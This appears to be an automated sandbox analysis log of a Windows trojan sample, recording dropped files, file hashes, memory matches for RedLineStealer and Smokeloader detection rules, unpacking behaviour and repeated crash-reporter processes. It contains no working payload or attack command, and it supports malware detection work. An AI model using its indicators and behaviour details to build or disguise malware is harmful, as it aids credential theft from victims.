Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041C9A90_2_0041C9A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041C2830_2_0041C283
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00424CDF0_2_00424CDF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_004124E30_2_004124E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00424DFF0_2_00424DFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_004127150_2_00412715
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_02185B670_2_02185B67
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217EBF70_2_0217EBF7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_021950660_2_02195066
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_021790C70_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218297C0_2_0218297C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218274A0_2_0218274A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_02194F460_2_02194F46
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218C4EA0_2_0218C4EA
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: String function: 0217DE07 appears 38 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: String function: 0040DBA0 appears 39 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2147353578.00000000035CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2147704479.0000000002E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@9/48@0/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_007AB146 CreateToolhelp32Snapshot,Module32First,0_2_007AB146
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\name[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3152
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: nine.exe0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: A@K.0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: two.exe0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: @G@K0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: ZYA.0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: NOSUB0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: GET0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: kc~z0_2_00408E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: n[B0_2_00425AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: @G@K0_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: A@K.0_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: @G@K0_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: ZYA.0_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: kc~z0_2_021790C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCommand line argument: P:C0_2_021790C7
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeReversingLabs: Detection: 50%
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeVirustotal: Detection: 36%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: wuliwiyixenotafube.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.hum:W;.tls:W;.wokeva:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .hum
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .wokeva
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C178 pushad ; retn 0042h0_2_0042C195
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042B105 push esi; ret 0_2_0042B10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C5CC push esp; retf 0_2_0042C5ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D67E push ecx; ret 0_2_0040D691
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C62A push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0042C756 push eax; iretd 0_2_0042C755
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217D8E5 push ecx; ret 0_2_0217D8F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218CF6F push esp; retf 0_2_0218CF77
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D4C9 pushad ; ret 0_2_0218D4CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D50C push eax; ret 0_2_0218D50D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218D56D push esp; retf 0_2_0218D56E
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeStatic PE information: section name: .text entropy: 7.8387433799683475
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
